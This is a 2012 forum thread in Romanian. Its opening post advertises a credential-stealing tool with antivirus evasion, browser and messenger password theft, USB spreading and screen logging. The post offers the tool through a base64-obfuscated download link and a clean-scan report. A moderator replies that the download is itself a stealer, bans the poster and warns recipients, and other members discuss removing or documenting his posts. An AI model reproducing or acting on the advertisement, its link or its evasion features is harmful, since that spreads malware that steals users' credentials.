vladimir Posted May 19, 2012 Report Posted May 19, 2012 (edited) Antis[x] AntiAnubis [x] AntiBitdefender [x] AntiKaspersky [x] AntiMalwarebytes [x] AntiNod32 [x] AntiNorman [x] AntiOllydbg [x] AntiOutpost [x] AntiWiresharkStealers[x] Google Chrome (latest version) [x] Mozilla Firefox (latest version) [x] Opera (version 10) [x] Windows Live Messenger (latest version)Features[x] Antis [x] Mail Encryption [x] Stealers [x] Cookie Deletion [x] Download Link Encryption [x] AV Site Blocker [x] USB Spread [x] Startup [x] Taskmanager Killer [x] Clipboard Logger [x] Steam Forcer [x] Downloader [x] Fake Error [x] Melt [x] Screen Logger [x] Mutex [x] Infection Notify [x] Native StubFile InfoReport date: 2012-05-14. Scan Occured: Link to scan: My-AVScan.com | Virus Scan Results for Allard.exe File name: Allard.exe File size: 121856 bytes MD5 Hash: 8450ec0acf527ad4467e45cad46049f6 SHA1 Hash: 35bf720237c3a4791840b974f59a201f7440970c Detection rate: 0 out of 37 Status: CLEAN DetectionsAVG - Clean. Acavir - Clean. Avast 5 -Clean. Avast -Clean. Avira -Clean. BitDefender -Clean. VirusBuster Internet Security -Clean. Clam Antivirus -Clean. COMODO Internet Security -Clean. DrWeb -Clean. eTrust-Vet -Clean. F-PROT Antivirus -Clean. F-Secure Internet Security -Clean. G Data -Clean. IKARUS Security-Clean. Kaspersky Antivirus -Clean. McAfee -Clean. MS Security Essentials -Clean. ESET NOD32 -Clean. Norman -Clean. Norton -Clean. Panda Security -Clean. A-Squared Security -Clean. Quick Heal Antivirus -Clean. Rising Antivirus -Clean. Solo Antivirus -Clean. Sophos -Clean. Trend Micro Internet Security -Clean. VBA32 Antivirus -Clean. Vexira Antivirus -Clean. Webroot Internet Security -Clean. Zoner AntiVirus -Clean. Ad-Aware -Clean. AhnLab V3 Internet Security -Clean. Bullguard -Clean. Imunitet -Clean. Vipre -Clean.Scan report generated by My-AVScan.comdownloand : aHR0cDovL3d3dy5tZWRpYWZpcmUuY29tLz9qN3IyY3plYnNuMG9seDU=AVG tipa. la mine merge perfect, si am pus si scanul acolo anti AVG nui.sursa : HF Edited May 19, 2012 by vladimir Quote
Starker Posted May 19, 2012 Report Posted May 19, 2012 (edited) Good. Un AntiAVG nu este pe undeva totusi? P.S. AVG-ul meu a tipat din prima. Edited May 19, 2012 by Starker Quote
wildchild Posted May 19, 2012 Report Posted May 19, 2012 L-am testat eu, este un stealer. Nici macar md5-ul nu coincide nici pe departe.De data asta ai ban permanent, nu mai poate garanta nimeni pentru tine. Mare greseala ca ti-am scos ban-ul cand mi-a cerut ps-axl, nu meritai.Permanent ai primit pentru spread, asa cum au platit toti care au incercat sa puna troieni si stealere pe forum doar doar o sa muste ceva pestisor. Am vazut ca si-a cam facut de cap prin pm-uri cu keyloggere, havijuri si alte minuni de genul. Cei care ati primit de la el executabile, mare atentie.PS: PM-urile si intimitatea userilor nu este violata sub nici un motiv exceptie fiind atunci cand un user este suspect de frauda sau inselatorii de genul. Quote
tao Posted May 20, 2012 Report Posted May 20, 2012 @wildchild: Foarte bine. Dar cred ca ar trebui sa ii cureti si prostiile pe care le-a pus; inclusi threat-urile lui. Astfel nu se mai loveste cineva de el si minunatiile lui. LE : Daca ai facut-o deja e bine si nu ma lua in considerare. TKS. Quote
tao Posted May 20, 2012 Report Posted May 20, 2012 @wildchild: Sau alta idee "stralucita" : poti face o sectiune separata in care sa faci public toate threat-urile, mesajele, pm. (absolut tot) cu stergerea link-urilor de download si ce mai tine de securitate. zic si eu , nu ma certati; acum voi decideti. Quote